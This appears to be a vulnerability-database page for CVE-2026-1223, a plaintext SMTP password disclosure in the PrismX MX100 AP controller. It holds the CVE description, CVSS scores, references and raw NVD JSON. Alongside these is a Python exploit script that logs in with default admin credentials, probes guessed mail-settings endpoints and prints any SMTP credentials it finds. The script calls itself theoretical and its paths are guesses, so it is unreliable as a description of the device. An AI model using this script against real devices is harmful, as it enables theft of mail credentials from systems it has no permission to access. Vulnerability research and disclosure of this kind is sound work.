CVE-2026-1223

Description

PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to allowing authenticated remote attackers to obtain SMTP plaintext passwords through the web frontend.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PrismX MX100 AP Controller 固件版本 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-1223 PoC - PrismX MX100 SMTP Credential Disclosure
# Note: This is a theoretical PoC for educational purposes only

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def exploit_cve_2026_1223(target_ip, target_port=443, username='admin', password='admin'):
    """
    Exploit CVE-2026-1223: Insufficiently Protected Credentials in PrismX MX100
    
    This vulnerability allows authenticated users to retrieve SMTP plaintext passwords
    through the web frontend of PrismX MX100 AP Controller.
    
    Args:
        target_ip: Target device IP address
        target_port: Target device port (default: 443)
        username: Administrator username
        password: Administrator password
    
    Returns:
        dict: Contains extracted SMTP credentials if successful
    """
    
    base_url = f"https://{target_ip}:{target_port}"
    results = {
        'smtp_server': None,
        'smtp_username': None,
        'smtp_password': None,
        'success': False
    }
    
    try:
        # Step 1: Authenticate to the device
        session = requests.Session()
        login_data = {
            'username': username,
            'password': password
        }
        
        login_response = session.post(
            f"{base_url}/api/login",
            json=login_data,
            verify=False,
            timeout=10
        )
        
        if login_response.status_code != 200:
            print(f"[-] Authentication failed: HTTP {login_response.status_code}")
            return results
        
        print(f"[+] Successfully authenticated as {username}")
        
        # Step 2: Access SMTP configuration page
        # Common paths for SMTP settings in AP controllers
        smtp_paths = [
            '/api/system/mail',
            '/api/settings/smtp',
            '/cgi-bin/mail_config.cgi',
            '/admin/mail-settings'
        ]
        
        for path in smtp_paths:
            try:
                response = session.get(f"{base_url}{path}", verify=False, timeout=10)
                
                if response.status_code == 200:
                    data = response.json() if response.headers.get('content-type', '').find('json') != -1 else response.text
                    
                    # Look for SMTP credentials in response
                    if isinstance(data, dict):
                        results['smtp_server'] = data.get('smtp_server') or data.get('mail_server')
                        results['smtp_username'] = data.get('smtp_username') or data.get('mail_username')
                        results['smtp_password'] = data.get('smtp_password') or data.get('mail_password')
                    
                    if results['smtp_password']:
                        results['success'] = True
                        print(f"[+] SMTP Credentials Found!")
                        print(f"    Server: {results['smtp_server']}")
                        print(f"    Username: {results['smtp_username']}")
                        print(f"    Password: {results['smtp_password']}")
                        break
            except Exception as e:
                continue
        
        if not results['success']:
            print("[-] SMTP credentials not found in common paths")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
    
    return results

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port] [username] [password]")
        print(f"Example: python {sys.argv[0]} 192.168.1.1 443 admin admin")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    user = sys.argv[3] if len(sys.argv) > 3 else 'admin'
    pwd = sys.argv[4] if len(sys.argv) > 4 else 'admin'
    
    exploit_cve_2026_1223(target, port, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1223
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1223
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1223/
[4] VulDB https://vuldb.com/cve/CVE-2026-1223
[5] https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1223", "sourceIdentifier": "[email protected]", "published": "2026-01-20T07:15:50.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to allowing authenticated remote attackers to obtain SMTP plaintext passwords through the web frontend."}, {"lang": "es", "value": "El controlador de AP PrismX MX100 desarrollado por BROWAN COMMUNICATIONS tiene una vulnerabilidad de credenciales insuficientemente protegidas, permitiendo a atacantes remotos autenticados obtener contraseñas SMTP en texto plano a través de la interfaz web."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html", "source": "[email protected]"}]}}